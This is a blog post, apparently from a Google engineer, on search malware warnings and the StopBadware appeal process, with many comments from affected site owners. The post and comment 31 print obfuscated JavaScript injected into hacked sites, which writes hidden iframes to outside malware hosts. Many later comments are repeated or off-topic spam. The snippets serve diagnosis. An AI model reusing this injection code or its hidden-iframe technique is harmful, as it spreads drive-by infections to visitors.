Info about malware warnings and how to appeal them

A recent post on the CIO blog got my attention:

Some website operators are complaining that Google is flagging their sites as containing malicious software when they believe their sites are harmless. ….

“We have no bad software or installs or anything that would indicate a need to ban people from viewing our site,” wrote Matt Blatchley, who works for the Greenbush Southeast Kansas Education Service Center, in a posting on Friday to Google Groups.

MattB, please double-check urls such as
http://sss.green bush.org/gbiss/Pricing.html
http://sss.green bush.org/gbiss/Time.html

(I split the urls to prevent accidental clicking. I wouldn’t go there unless you’re running Linux.) View the source and look at the bottom of the page. See the code that looks like

<script language=”javascript” type=”text/javascript”>var k='(encoded gibberish)’,t=0,h=”;while(t<=k.length-1){
h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>

I think that’s what is causing your problem. It looked like your site might be hosting a WMF exploit that could infect any visitor to your site.

I’ve checked out a quite a few “we don’t have any malware” reports at this point, and I’ve yet to see a false positive — the sites in question have each had some malware on them. But this change is also relatively new, and we’ll keep working on ways to help site owners diagnose if their site has been hacked and is distributing malware. Maybe we can show some of the urls that appear to have malware in our webmaster console, for example. In general, I’d check file-modification times for the pages on your site to see if someone has changed your pages recently.

In the mean time, here’s how to appeal if your site is flagged as hosting malware:
– Click on the “StopBadware.org” link on the interstitial that Google shows.
– On the resulting page is the phrase “If you are the administrator of the website that was reported to us and would like to speak with us, please see our contact page.” Click on that contact link to get to http://www.stopbadware.org/home/contact_general to read about how to email and lodge an appeal with StopBadware.

I think this process can still be improved, but at the same time, we’ve heard very positive reactions from users that don’t want to click on potential malware pages. Ultimately I think it helps to alert webmasters that they may be serving up malware to their visitors, because if a site has been hacked it’s good to know about that quickly.

Update: Looks like the webmaster console team has now added example urls for sites that we think are hosting malware. This is a great step to give webmasters more tools to self-diagnose any malware-related issues with their site. As always, thanks to the folks who added this feature.

172 Responses to Info about malware warnings and how to appeal them (Leave a comment)

  1. If you actually decode the gibberish (I changed the “document.write” to “alert” to be safe), you see that it retrieves a hidden IFRAME from user10 dot iframe dot ru. I retrieved the URL in question (with wget), it contains HTML that loads three other IFRAMEs, one from zchxsikpgz dot biz, which doesn’t reolve, and two from statrafongon dot biz, which does.
    I retrieved one of those (again with wget), it contains some nasty looking Javascript that is definitely an exploit. (I know so because it contains a function called “Exploit.” 🙂 Also, lots of scary ActiveX and XMLHTTP stuff.)

    Definitely malware, indeed.

    – Michael

  2. I have seen a number of these the last couple days and I welcome the warning. They are even on some of the computer forums that I post to almost everyday….wow…very scary.

  3. I think it’s a fantastic feature.

    Perhaps Google could somehow cache the page minus the offending malware code so that visitors can still view the page in some form whilst the owner fixes it?

  4. Great info, Matt. I hope I never need that, but it’s great to have the information anyway.

  5. Maybe someone could help me with this one?

    The strange thing is that my stats show I was getting huge traffic from a folder on my site to a specific post. It’s beyond me to figure it out so I deleted the folder instead. No smilies on SEO Buzz Box! ;-(

  6. If this keep up, Matt, you won’t have much of a job to do on the debunking side – people will just mutter “Crying Wolf, again.” 🙂

  7. assuming you are detecting this malware “programtically” how long does it take to initiate the “malware flag”. How long does it take to get back in once it’s changed, and why does that require a hand review instead of the same “programatic” approach you use for detecting the problem in the first place.

  8. Would it make sense to include a small “are you the webmaster of this page?” notice at the Google warning page, leading to some more specific help entry at StopBadware or Google?

    Warning page for reference:
    http://www.google.com/interstitial?url=http://www.greenbush.org/

  9. More importantly, if the malware is detected automatically why isn’t the absence of the malware also detected and the site reincluded automatically?

  10. Speaking of malware:
    Did you update your wordpress Matt?
    There are not so funny exploits going around and even some 0-days- exploits that look dangerous.(no i am not posting URLs here…)
    Although i was not able to hack my own blog with them everyone should update quickly!

    Even i was tempted to hack your blog to get some fun backlinks with the exloits flying around and i am a white hat 🙂

  11. graywolf, once someone wants to come and appeal something, it makes sense to ask a human to check into it in more detail. We rely on StopBadware because of their expertise for the appeal. They’d be the people to ask about how long appeals take (I think they shoot for a decision within 10 business days, maybe?).

  12. so saying that a human will do a more through job checking than a program, you acknowledge the possibility does exist of a false positive/negative from the program even though you’ve never seen one, correct?

    I’d go so far as to say there’s no such thing as a perfect bug free program it just doesn’t exist

    At some point a program or algo will “make a mistake” and identify something erroneously and with draconian punishments in place the damage of those potential but inevitable false positives are magnified with devastating affects on the recipients.

    (crap did I eat a bowl of how to talk like a lawyer for breakfast)

  13. I had this problem. My website was flagged by google and by stopbadware. After 2 weeks they released the flag because they found nothing. It costed me around 3,000 in damages do to my traffic being 40% from Google.

  14. I can see one reason why a site wouldn’t be automatically reincluded in a malware scenario:

    SIte A owner produces some variant of malware to promote Site A and uses it on Site B, which he/she also owns (and it would be easy enough for Site B to set up a different name/address/IP address for the site/etc. so for those who say it would be easy enough to detect, not necessarily true.)

    Site B gets caught with the malware.

    Site A owner (who is also Site B owner) alters the malware in such a way as to bypass automated malware checker.

    Site B is reincluded and can stay there as long as the second strain of malware goes undetected. If this goes for a week, two weeks, or even a month before someone figures it out…well, Site A/B owner doesn’t give a damn what happens to his/her site because he/she got what he/she wanted.

    Not only that, the manual review forms the same two-way communication deal that all of us webmasters bitch, moan and complain about like Paris Hilton. So why are we bitching now that we get it?

  15. Philipp Lenssen, I agree that something like that is a good idea.

    graywolf, you did eat a bowl of Lawyer Flakes. Of course any program can have an error. That’s why I’m glad that there’s a reinclusion/appeal process for the badware. I’m just saying that in the urls I’ve looked up, I haven’t found any errors yet (i.e., each site was hosting some malware).

    M.W.A., danged if we do and danged if we don’t. 🙂

  16. This is all good, But i sell trousers and bowler hats and i got flagged for “male wear”.

  17. Matt, terribly sorry to bug you, but they still don’t have comments turned on for the Inside AdWords blog. I know you’re big on fighting spam. Can you relay a message to the AdWords team, please. Your post about malware is timely as it appears as if Google’s AdSense for Domains program is (inadvertently, I hope) funding a company that creates spyware. I’m not kidding. Anyone here who buys AdWords on the Search network (I’m not talking about the Content network), check your logs for referring URLs from this domain:

    searchportal.information.com

    Nasty stuff. Yes, NOT on the Content network. On the Search network. Yikes! Somebody’s got to stop this spam.

  18. Matt,

    The idea is just fine. The problem is that it’s too easy to get a site flagged like this. The warning goes up when a report comes in from the public, and there’s apparently no checking that the report is legit.* Can’t wait ’til this becomes a new SEO tactic. 🙂

    I’m familiar with one site that was flagged like this, and after some griping/appealing, the flag was removed — a false positive. Would love to know who made the initial report……

    *Can you confirm that?

  19. Funny I found malware in the email article at WebProWorld talking about this blog entry.

    And the link was Matt’s blog – now that has to be called something… ‘ironical’ perhaps…..

  20. Matt;

    I wanted to find out which datacenter some results I was seeing today were on, but when I tried to ping Google it gave me the wrong info. Then I tried checking the info in the cache, but that too was wrong. Any ideas on another way I can find out which datacenter these results came from? 🙂

    Thanks!

  21. gah you seem to be the unofficial well everything for google, it looks like you would get enough hits and questions for this to be a full time job (as a volunteer to the web you seem to be doing an amazing job)

    do you know how StopBadware.org deals with code repository sites e.g code.google.com (php,asp,javascript,etc)?

    as a above poster said I think a “are you the webmaster of this page?” link is a great idea, the site does seem very closed

    thank you for your time

    Lone ranger = “When supporting the customer, YOU ARE the company” = Matt Cutts = Google = do no evil

  22. Today I am ranking for things like “Prozac Medications”, ringtones and porn in Google search.

    Someone is using my blog to game Google and doing very well at it. I have screenshots, stats, IP’s to show if anyone there at Google is interested.

    Google detects no malware but boy is someone ranking well in organic search, I feel used.

    Lame!

  23. In case some people are confused about not finding the actual malware on their own server, they need to check their domain name registrations at their registrars. What certain a-holes have been doing is cracking your registrar username and password then creating a subdomain from your registrar i.e a new subdomain to sss.mywellintentionedsite.com, this site’s DNS is pointed at and hosted by the a-hole on a server they control. While http://www.mywellintentionedsite.com is still running along unchanged and you may be totally unaware of the problem until Google notifies you or you find the nasty change in your domain registry account. That is if you can still access your own account.

  24. Like one of the other commenter’s noted, I believe that updating the WP would disable any type of malware found within a generic source code.

  25. My site got hacked a little while ago using a cpanel/whm exploit. Every page in the site had a tag like that added at the bottom. Luckily I noticed it within a day and restored the backup but it could be that many sites are suffering from this due to this hack.

  26. Thanks Matt! Dude you are really cool with these informations…

    Take care

    Manish Pandey

  27. Hey Matt,

    I am real estate site owner and I developed and did the basic seo work but recently I don’t know why my SERP position got down so bad that I am the last guy in the SERP. Could you please let us know why it is happening. There is a big thread is going on in WMW about this “950 penalty”

  28. In ny ever so humble opinion, Google needs to step up their public presence rather than hiding behind StopBadware.org.

    1.) If they identify a problem they should notify the website owner and indicate generally what type of problem they found. Or, as suggested above provide a link to information about the malware found.

    2.) They need to control the appeals process because if the best StopBadware.org can do is two weeks, that’s rather pathetic and crippling to a small business. I’m losing thousands of dollars. Once the problem has been eradicated you should be able to re-submit for a quick re-examination and have the warning removed within 12 hours.

    This blog is excellent by the way.

  29. My website at http://www.wowdirectoryarticles.com is being blocked. Stopbadware.org has check the site and found no malware.

    “After testing your site in response to the email that you sent to appeals@stopbadware.org, we have made a preliminary determination that your site appears to no longer host or distribute badware. We have informed Google of this finding, and they will conduct their own testing on your site. Google makes its own determinations about whether to remove any interstitial pages it has posted; however, in our experience, whenever we have reported to Google that we found a site to be free of badware at the time of our review and their own follow-up testing confirms our results, the interstitial page has been promptly removed. If Google does remove the interstitial page that is currently being served for your site, they will advise us. On the other hand, if Google’s separate, independent testing finds that there is still badware present on your site, then they will inform us of that finding.”

    My web designers and IT service can find no problems. How can we find out why Google still has the website blocked? We can correct any problems found but we need to know what Google is finding.

  30. Does nobody at Google ever tell these people the truth? What are the people supposed to do who invested ten years and more of their lives into their web sites? I just discovered my second web site has been booted and I’ve never gotten an answer on the first one. That’s my livelihood, a couple thousand dollars a month to pay the bills. Now I’m going to be homeless. I’m 50 years old and I can’t start again. I’m not kidding. Congratulations Google.

    Everything Google does is to give the edge to corporations with hundreds of thousands of dollars to spend on advertising and programming.

    Local web developers need to go back to Yahoo or MSN. To hell with Google.

  31. Bruce, your designers and IT service probably aren’t looking hard enough. You got some weird stuff going on there, dude.

    <iframe src=”http://xaqjlyswly.biz/dl/adv433.php” width=1 height=1></iframe>

    And two of these:

    <script type=’text/javascript’>
    str=’@3c@49@46@52@41@4d@45@20@57@49@44@54@48@3d@31@20@48@45@49@47@48@54@3d@31@20@53@43@52@4f@4c@4c@49@4e@47@3d@66@61@6c@73@65@20@46@52@41@4d@45@42@4f@52@44@45@52@3d@30@20@53@52@43@3d@27@68@74@74@70@3a@2f@2f@77@77@77@2e@6e@65@74@6d@6f@6e@65@79@6d@61@6b@65@72@2e@63@6f@6d@2f@6c@69@63@65@6e@73@65@2f@63@6f@6e@66@69@72@6d@65@64@2f@41@72@74@69@63@6c@65@42@65@61@63@68@27@20@3e@3c@2f@49@46@52@41@4d@45@3e’;
    document.write (unescape(str.replace(/@/g,’%’)));
    </script>
    <script type=’text/javascript’> str=’@3c@49@46@52@41@4d@45@20@57@49@44@54@48@3d@31@20@48@45@49@47@48@54@3d@31@20@53@43@52@4f@4c@4c@49@4e@47@3d@66@61@6c@73@65@20@46@52@41@4d@45@42@4f@52@44@45@52@3d@30@20@53@52@43@3d@27@68@74@74@70@3a@2f@2f@77@77@77@2e@6e@65@74@6d@6f@6e@65@79@6d@61@6b@65@72@2e@63@6f@6d@2f@6c@69@63@65@6e@73@65@2f@63@6f@6e@66@69@72@6d@65@64@2f@41@72@74@69@63@6c@65@42@65@61@63@68@2f@66@6f@6f@74@65@72@2e@68@74@6d@27@20@3e@3c@2f@49@46@52@41@4d@45@3e’; document.write(unescape(str.replace(/@/g,’%’))); </script>

    For all the people at home who want to see what the Javascripts generate, replace “document.write” with “alert”.

    What do you need three inline frames of a 1×1 nature for? There’s no good reason for that, and I’m surprised stopbadware.org didn’t catch that. It took me about 30 seconds to find the script, and another two minutes to find the inline frame sans script.

  32. Wow, do those Javascripts ever break up the blog layout. (See? Another reason you shouldn’t use them. 😉 )

  33. Some respectable folks use this kind of Javascript to obfuscate Mailto’s and/or stand-alone email addresses in the hope of evading email-harvesting spam engines.

    Is this type of Javascript likely to raise a malware alarm by itself, or only if the decoded content is itself far from benign?

  34. My site is also signed as harmful. Traffic from Google is 95% down. Someone hacked my ftp password. I think, by getting the local stored ftp connection file, because the password was to strong to hack. Yes I have a firewall and a virus protection with the latest patches from a well known company.

    I confirm with Matt McGee, this new automatic flag can be a strong weapon against competitors. The first review takes at the moment ten days. For second review you are at the end of the queue.

  35. One more. At the moment, when someone founds my Site by Google Search and want to open it, the following pages wit the warning, it seams that I (no one else) want to harm the websurfer. It should be a little more clear, when Google shows the harmful sites in the SERPs that some of those “harmful sites” may are victims and not agressors to capture surfers computer. I my case it is only a private homepage, but for companies it is more difficult to declare their customers that won´t harm them. Especially when it take weeks until the warning is may switched off.

  36. Google throws up a false positive for my site – http://www.tiswasonline.com – a non-profit website that has no malicious software on it at all (I’ve checked, I’m employed to look out for viruses as a day job!).

    So if this is happening to my site, how many other innocent non-profit webmasters are also getting this?

    And it’s ironic that cracks and serial numbers sites such as Astalavista (which has malicious software via ActiveX on almost every page) is not being flagged up by Google!

    So, the badware writers get away with it, while the badware-free sites end up being libelled by Google. I think a thorough review of this whole process is needed at Google Towers immediately.

  37. I was just about to blow my top w/Google in defense of a client whose site got the notorious malware warning.

    Please add to the documentation to look for “unescape” in the code. My client was on a cpanel machine and a piece of javascript had been appended to the top line of the home page.

    Traffic had dropped by nearly 40% and it was about 2 hours ago that my client brought the warning to my attention. It has since been corrected and we can only hope the warning on Google and the interstitial can be removed quickly as he’s a CPA and March is to accountants what the Thanksgiving-to-Christmas window is to mall retail stores.

  38. Dear Matt,

    I feel my website has been falsely accused (it is a website for my artwork) & I have sent an appeal. But in the meantime I was hoping you could view the page source for my website and maybe identify why the heck they would have falgged it as “harmful,” though I viewed it myself & have no freaking clue as to what the problem could be. If you’re able to see what’s wrong I could promptly fix it.

    you can email me at:
    ryan[at]crackedanimations.com

    Thank you in advance
    -Ryan

  39. ****UPDATE

    I read a few of the comments above and I, too, use a cpanel & the word “unescape” is indeed in my code (at the very top). I cannot get rid of this code because it is automatically added (i assume) through my host ipowerweb

    What am I supposed to do???

    -Ryan

  40. ***UPDTAE #2

    Well, I re-uploaded my index.htm file & now that “unescape” line of code that was appearing at the top is now gone. So hopefully google will see that and take the warning off my search results sometime soon..

    -Ryan

  41. Fantastic blog by the way.
    I have a website for my band flagged by google as having potentially harmfull content.
    I certainly haven’t put any malicious content on myself but if anyone has any way of checking my site I would be over the moon.
    My URL is http://www.makinwhoopee.com.au
    It is crippling traffic to my site and I rely on the modest sales to make a living.Like others on your blog, I find it incredibly frustrating that Google do not automatically tell you the specific problem if they can automatically detect one? In the webtools area I hoped for a clue but to no avail. I have very little understanding of code so I feel helpless to find it fix it myself (if it exists). I have contacted stopbadware and am on their 10 day waitlist. I dread it happening again and being on their “long” waitlist. I suspect if the problem is not made easier to fix by Google, a class action could be made by all the businesses losing revenue by being flagged without a real reason or for being remedied so slowly that it put them out of business. Tony

  42. 24 hours later the warning was removed from my site. Very grateful. Don’t know why? All very mysterious. Tony

  43. Eric Wettstein

    While I find this protection helpful, it has some implementation problems. A website I manage was flagged by Google, but Google was not the first to tell me. I did not get an email at webmaster@orgwithinreach.com or the address registered with Google site manager. A customer told me first!

    After searching Google and looking at site manager, I found the message. It was useless at that time. It just sent me to stopbadaware.org, which did not yet have my site in it.

    I looked at the source code for my site and I did find the hacked-in java script and immediately removed it. I’m checking it everyday to make sure it doesn’t come back and am investigating what I can to prevent it.

    Of course, my site is still flagged. The reply from stopbadaware.org was that it could take up to 10 days for my appeal to be processed. That’s too long for my small business! I am going to stop my advertising with Google until it’s resolved, but this really hurts because our first showroom will be opened within the next couple of weeks.

    As I said I think this service is helpful, but there has to be a better way to get my site cleared! Since a Google bot probably found it, couldn’t I ask for it to rescan my site so I wouldn’t have to wait so long?

  44. Hi,

    This blog is great, thanks for having this subject up here. I’ve been battling to try and get a site I manage for a client re-included in the index. It was hacked a little while ago (somehow…!) and iframe’s were inserted. I thought they were all removed, but it seems some internal pages in the archive were still pointing to malware content… Nobody ever visited them anyway so the problem wasn’t brought to light until people started getting very alarmed by Google’s warnings!

    It’s a real shame as the site is totally legit and innocent htp://www.amateurjockeys.co.uk

    I’m still going through the appeals process, it’s been about 4-5 weeks now, although to be fair they did get back to me after about 2 weeks saying that some internal pages still had dodgy iframes in.

    So i’ve since checked EVERY SINGLE page manually, which took ages, and resubmitted for review again… We’re still waiting 🙁

    I’ve even swapped the domain over now, as you will see if you visit the site, and pointed the old site to it, in the hope that might circumnavigate the problem.

    While I agree that spam is the scum of the earth, you are really only penalising innocent people a LOT of the time with this approach I think.

    Just a suggestion, but why not send out warning messages to webmasters telling them to take action before there site is blacklisted.

    Also why not create a spider tool so we can check all our sites. I’m really scared now that other websites I look after will be affected and blacklisted.

    This could put people out of business!

    Please give us a tool so we can check our sites ourselves?

    Thanks,
    Tom

  45. I agree with Chuck. If Google is going to do this they need to take control or the notification and review process instead of relying on StopBadware.org. They’re not set up for handling large volumes of reviews.

    I’m an attorney and this warning is crippling to a business like mine. http://www.visaatty.com I spend thousands of dollars advertising on Google and I insist on better. I didn’t even know the block was there until a freaked out client told me. Here I am paying Google for ppc ads when they’re blocking my search listings. I suspect the block has been there for a couple of months and as a review of my stats shows my Google traffic going from over a thousand per month to zero. I feel like an ass.

    What Google and StopBadware.org are attempting to do is a good thing but from reading this thread it seems like sites are being hacked and innocent people are being injured. Trying to get it resolved is like dealing with the U.S. government. Worse actually, with the government I’m always able to get feedback and processing times.

    Microsoft has a Phishing filter on the new Explorer7.0 and they are able to do a review and remove the warning within 24 hours. They seem to understand the seriousness their actions and have procedures in place to act accordingly to remove flags. After reading Matt’s response to Graywolf it’s clear that Google doesn’t think it’s a big deal.

  46. I’m happy to report the warning was removed today. From the time I notified stopbadware.org to the time the Google removed the warning was a total of four business days. Not a bad turnaround.

    In the future I’ll need to be more vigilant about checking my site and search listings. This warning was up for a couple of months and I didn’t know about it. Adwords customers should be notified somehow that their sites are getting this warning for regular search. It’s bad business on Google’s part to be sending traffic to sites it suspects of hosting malware for paid search but not for regular search.

  47. Perhaps Google could somehow cache the page minus the offending malware code so that visitors can still view the page in some form whilst the owner fixes it?

  48. I am glad I found this thread.
    I bought some software off Ebay – installed it – and found that while working on bringing up pages it was calling external sites (saw that via status bar).
    Checked the code and saw:

    str=’@3c@49@46@52@41@4d@45@20@57@4 etc etc etc
    which I googled and it brought me here.

    So, all I want to say is BEWARE where and from whom you buy your software!!!!!

  49. I’m happy to report the warning was removed today. From the time I notified stopbadware.org to the time the Google removed the warning was a total of four business days. Not a bad turnaround.

  50. I just know another very good, old 1996 website has been falsely accused recently from last 3 days – http://www.digits.com – I use their service for 4 years, visit the site without any problem at all.

  51. assuming you are detecting this malware “programtically” how long does it take to initiate the “malware flag”. How long does it take to get back in once it’s changed, and why does that require a hand review instead of the same “programatic” approach you use for detecting the problem in the first place.

  52. Microsoft has a Phishing filter on the new Explorer7.0 and they are able to do a review and remove the warning within 24 hours. They seem to understand the seriousness their actions and have procedures in place to act accordingly to remove flags. After reading Matt’s response to Graywolf it’s clear that Google doesn’t think it’s a big deal.

  53. Some day ago I also have some bad ware flag in google resut for my website http://www.etatvasoft.com but when i check my server for badware and malicious software with stopbadware guide line and coorrect it then contect stopbadware.org back and Today my website is out of that flag. Google remove worning massage from my website.

    Jim
    http://www.tatvasoft.com

  54. I had this problem. My website was flagged by google and by stopbadware. After 2 weeks they released the flag because they found nothing. It costed me around 3,000 in damages do to my traffic being 40% from Google

  55. I had this problem. My website was flagged by google and by stopbadware. After 3 weeks they released the flag because they found nothing. It costed me around 4,000 in damages do to my traffic being 70% from Google.

  56. Like one of the other commenter’s noted, I believe that updating the WP would disable any type of malware found within a generic source code.

  57. I had this problem. My website was flagged by google and by stopbadware. After 3 weeks they released the flag because they found nothing. It costed me around 4,000 in damages do to my traffic being 70% from Google.

  58. also check for javascript or broken links to other machines, I read that was the cause of someone being listed for having malware

  59. Microsoft has a Phishing filter on the new Explorer7.0 and they are able to do a review and remove the warning within 24 hours. They seem to understand the seriousness their actions and have procedures in place to act accordingly to remove flags. After reading Matt’s response to Graywolf it’s clear that Google doesn’t think it’s a big deal.

  60. Like one of the other commenter’s noted, I believe that updating the WP would disable any type of malware found within a generic source code.

  61. Perhaps Google could somehow cache the page minus the offending malware code so that visitors can still view the page in some form whilst the owner fixes it ???????

  62. This is really strange. I have a site that was flagged by google as having Malware on it about 3 weeks ago. It is a site that was not really very important to me so I just left it and thought I would deal with the problem when I have the time. Well, today I had some time so I Googled the site up and amazingly the flag is gone. No more “This site could damage your compute” message. What gives? I haven’t touched the site and nobody has access to it but me. Was this a mistake by Google and they picked up on it?

    It doesn’t really bother me because it was just a minor site, but it could have been one of my income earning sites?

    What are you doing Mr. Google???????????????

  63. I have seen a number of these the last couple days and I welcome the warning. They are even on some of the computer forums that I post to almost everyday….wow…very scary.

  64. I believe that updating the WP would disable any type of malware found within a generic source code.

  65. thanx
    I believe that updating the WP would disable any type of malware found within a generic source code.

  66. What Google and StopBadware.org are attempting to do is a good thing but from reading this thread it seems like sites are being hacked and innocent people are being injured. Trying to get it resolved is like dealing with the U.S. government. Worse actually, with the government I’m always able to get feedback and processing times.

    Microsoft has a Phishing filter on the new Explorer7.0 and they are able to do a review and remove the warning within 24 hours. They seem to understand the seriousness their actions and have procedures in place to act accordingly to remove flags. After reading Matt’s response to Graywolf it’s clear that Google doesn’t think it’s a big deal.

  67. This is really strange. I have a site that was flagged by google as having Malware on it about 3 weeks ago. It is a site that was not really very important to me so I just left it and thought I would deal with the problem when I have the time. Well, today I had some time so I Googled the site up and amazingly the flag is gone. No more “This site could damage your compute” message. What gives? I haven’t touched the site and nobody has access to it but me. Was this a mistake by Google and they picked up on it?

    It doesn’t really bother me because it was just a minor site, but it could have been one of my income earning sites?

    What are you doing Mr. Google???????????????

  68. Perhaps Google could somehow cache the page minus the offending malware code so that visitors can still view the page in some form whilst the owner fixes it ???????

  69. I have seen a number of these the last couple days and I welcome the warning. They are even on some of the computer forums that I post to almost everyday

  70. I have seen a number of these the last couple days and I welcome the warning. They are even on some of the computer forums that I post to almost everyday….wow…very scary.

  71. I think because OCR is more developed than adding numbers, by spam bots, so for the moment it gives better results.

  72. I wanted to find out which datacenter some results I was seeing today were on, but when I tried to ping Google it gave me the wrong info. Then I tried checking the info in the cache, but that too was wrong. Any ideas on another way I can find out which datacenter these results came from?

  73. Is this type of Javascript likely to raise a malware alarm by itself, or only if the decoded content is itself far from benign?

  74. I think because OCR is more developed than adding numbers, by spam bots, so for the moment it gives better results.

  75. 24 hours later the warning was removed from my site.

  76. I have seen a number of these the last couple days and I welcome the warning. They are even on some of the computer forums that I post to almost everyday….wow…very scary

  77. I’ve been trying random site addresses with the site: command seems to be happening for pretty much every site i looked at thats UK based, this must be some sort of bug or work in progress….

  78. Please add to the documentation to look for “unescape” in the code. My client was on a cpanel machine and a piece of javascript had been appended to the top line of the home page. ..

  79. My client was on a cpanel machine and a piece of javascript had been appended to the top line of the home page.!

  80. Thats a great story matt . It seems absolutely hillarous to me that people still think search can be determined worldwide out of a few people in silicon valley. Locall knowledge and culture is ignored…

  81. Is this type of Javascript likely to raise a malware alarm by itself, or only if the decoded content is itself far from benign? Yes

  82. Great info, Matt. I hope I never need that, but it’s great to have the information anyway

  83. What Google and StopBadware.org are attempting to do is a good thing but from reading this thread it seems like sites are being hacked and innocent people are being injured. Trying to get it resolved is like dealing with the U.S. government.

  84. Was this a mistake by Google and they picked up on it?

  85. Then I tried checking the info in the cache, but that too was wrong…

  86. Trying to get it resolved is like dealing with the U.S. government. Worse actually, with the government I’m always able to get feedback and processing times.

  87. Microsoft has a Phishing filter on the new Explorer7.0 and they are able to do a review and remove the warning within 24 hours. They seem to understand the seriousness their actions and have procedures in place to act accordingly to remove flags. After reading Matt’s response to Graywolf it’s clear that Google doesn’t think it’s a big deal…

  88. Looks like the webmaster console team has now added example urls for sites that we think are hosting malware. This is a great step to give webmasters more tools to self-diagnose any malware-related issues with their site. As always, thanks to the folks who added this feature…

  89. This is all good, But i sell trousers and bowler hats and i got flagged for “male wear”.

  90. Then I tried checking the info in the cache, but that too was wrong…

  91. This is a great step to give webmasters more tools to self-diagnose any malware-related issues with their site.

  92. based, this must be some sort of bug or work in progress

  93. I’m the first to admit I am easily excited. Sure, desktop search has been around a long time. But the intgeration with a service as ubiquitous as Google is a big difference.

  94. My BIG question is when will the program be available for the million others that use an older o/s like Win98 or Win ME?

  95. I am real estate site owner and I developed and did the basic seo work but recently I don’t know why my SERP position got down so bad that I am the last guy in the SERP. Could you please let us know why it is happening. There is a big thread is going on in WMW about this 950 penalty

  96. It seems absolutely hillarous to me that people still think search can be determined worldwide out of a few people in silicon valley. Locall knowledge and culture is ignored,

  97. innocent people are being injured. Trying to get it resolved is like dealing with the U.S. government. Worse actually, with the government I’m always able to get feedback and processing times.

  98. I am real estate site owner and I developed and did the basic seo work but recently I don’t know why my SERP position got down so bad that I am the last guy in the SERP. Could you please let us know why it is happening.

  99. I believe that updating the WP would disable any type of malware found within a generic source code

  100. Like one of the other commenter’s noted, I believe that updating the WP would disable any type of malware found within a generic source code..

  101. One of my frustrations reading here is the comments/posts from those who hijack any number of threads wanting help from you with what they perceive as their specific problem for their site – they should be deleted as imagine how many more will happen if word got out.

  102. Impressive article. I reallly like and share your ideas. I think the contributors are much more important. Articles should’t be deleted because of format, I wouldnt call it a good idea. IMHO it is unfair for contributors it seems to spoil esoteric character of Wikipedia as the palce that unites people under the flag of sharing information. Wikeipedia is one of those places that make information free an accessible. Format shouldnt be improtnat this what seems to be esenctial – is content. Best regards

  103. I believe that updating the WP would disable any type of malware found within a generic source code

  104. This is a great step to give webmasters more tools to self-diagnose any malware-related issues with their site.

  105. Excellent. This will be very useful as the source code doesn’t exhaustively include code templates for all the classes you need to create to build applications with Cairngorm2. So it’s hard to work it out without an example.
    Talking of the advantages of strong-typing, is there a good reason that the response events that the Cairngorm2 ServiceLocator raises are weakly typed ( event : * = null ) rather than mx.rpc.events.ResultEvent and mx.rpc.events.FaultEvent? As it stands, because of this, event handlers in user-written Cairngorm2 “commands” need to cast the event to its correct type before using it.

  106. I have seen a number of these the last couple days and I welcome the warning. They are even on some of the computer forums that I post to almost everyday

  107. I’m a big fan of both Neil Gaiman and crankgeeks, but this episode did not work for me. The combination of celebrity guest with opinionated, talkative panel members seems tough to pull off. You end up wanting to hear more from each side. And, I defintely agree with previous comments – Dan Farmer was wasted, please have him on again. I loved the questions geared towards the writing process

  108. At some point a program or algo will “make a mistake” and identify something erroneously and with draconian punishments in place the damage of those potential but inevitable false positives are magnified with devastating affects on the recipients.

  109. Malware is software designed to infiltrate or damage a computer system without the owner’s informed consent. It is a portmanteau of the words “malicious” and “software”. The expression is a general term used by computer professionals to mean a variety of forms of hostile, intrusive, or annoying software or program code.

  110. I believe that updating the WP would disable any type of malware found within a generic source code

  111. This is a great step to give webmasters more tools to self-diagnose any malware-related issues with their site.

  112. I’m the first to admit I am easily excited. Sure, desktop search has been around a long time. But the intgeration with a service as ubiquitous as Google is a big difference.

  113. Then I tried checking the info in the cache, but that too was wrong

  114. have seen a number of these the last couple days and I welcome the warning. They are even on some of the computer forums that I post to almost everyday

  115. I’m a big fan of both Neil Gaiman and crankgeeks, but this episode did not work for me. The combination of celebrity guest with opinionated, talkative panel members seems tough to pull off. You end up wanting to hear more from each side. And, I defintely agree with previous comments – Dan Farmer was wasted, please have him on again. I loved the questions geared towards the writing process

  116. I’m a big fan of both Neil Gaiman and crankgeeks, but this episode did not work for me. The combination of celebrity guest with opinionated, talkative panel members seems tough to pull off. You end up wanting to hear more from each side. And, I defintely agree with previous comments – Dan Farmer was wasted, please have him on again. I loved the questions geared towards the writing process

  117. This page makes for a very depressing read.

    I have been hit by the dreaded malware warning and it could not have come at a worse time. My business only started in April, and I don’t think my visitor count had yet been more than ten a day. Nevertheless, visitor numbers were increasing and my Google ranking was improving steadily.
    Then the Google bomb landed – right at the start of a bank holiday weekend. This has crippled me. My hosting company has said that site and my server are clear and secure. An explanation would have been helpful.
    Would it not make more sense for Google to remove “suspect” pages from its index and contact web masters direct, enabling a professional investigation to take place? The current process is humiliating and frankly libellous.Surely a company with Google’s wealth and resources could handle matters in a more diplomatic and considerate matter.
    Google and its little side-kick, stopbadware.org, are both apparently incapable of responding to emails too.
    There are MILLIONS of sites on Google and thousands which do warrant tighter control – mine is a business site and is not one of them.

  118. Google Gadgets are mini-applications that work with the Google homepage, Google Desktop, or any page on the web. They can range from simple HTML to complex applications, and can be a calendar, a weather globe, a media player, or anything else you can dream up.

  119. believe that updating the WP would disable any type of malware found within a generic source code.

  120. I’m a big fan of both Neil Gaiman and crankgeeks, but this episode did not work for me. The combination of celebrity guest with opinionated, talkative panel members seems tough to pull off. You end up wanting to hear more from each side. And, I defintely agree with previous comments – Dan Farmer was wasted, please have him on again. I loved the questions geared towards the writing process

  121. This is a great step to give webmasters more tools to self-diagnose any malware-related issues with their site.

  122. How does it take for Google to review when a web site request for review?

    It seems that Google now has its own internal review instead of relying on StopBadware.org.

    If so, how can we speed up this process?

    Thanks

  123. Man, I knew all about malware infecting your computer – but infecting your site?? That’s not good news! I need to research this more – I never knew there was this kind of risk!
    I think Malware developers are obviously good friends with terrorists and drug dealers. Really. They’re just as bad these days – there antics are totally ridiculous, and I have a suspicion this problem is going to come to a major escalation soon and they are going to be tried as the criminals they are.
    Thanks for the heads up. I hope that the company that hosts my site is at least able to stop this from happening.

  124. Perhaps Google could somehow cache the page minus the offending malware code so that visitors can still view the page in some form whilst the owner fixes it..
    I agree with that opinion..

  125. It seems that Google now has its own internal review instead of relying on StopBadware.org.

  126. How does it take for Google to review when a web site request for review?

  127. Man, I knew all about malware infecting your computer – but infecting your site?? That’s not good news! I need to research this more – I never knew there was this kind of risk!
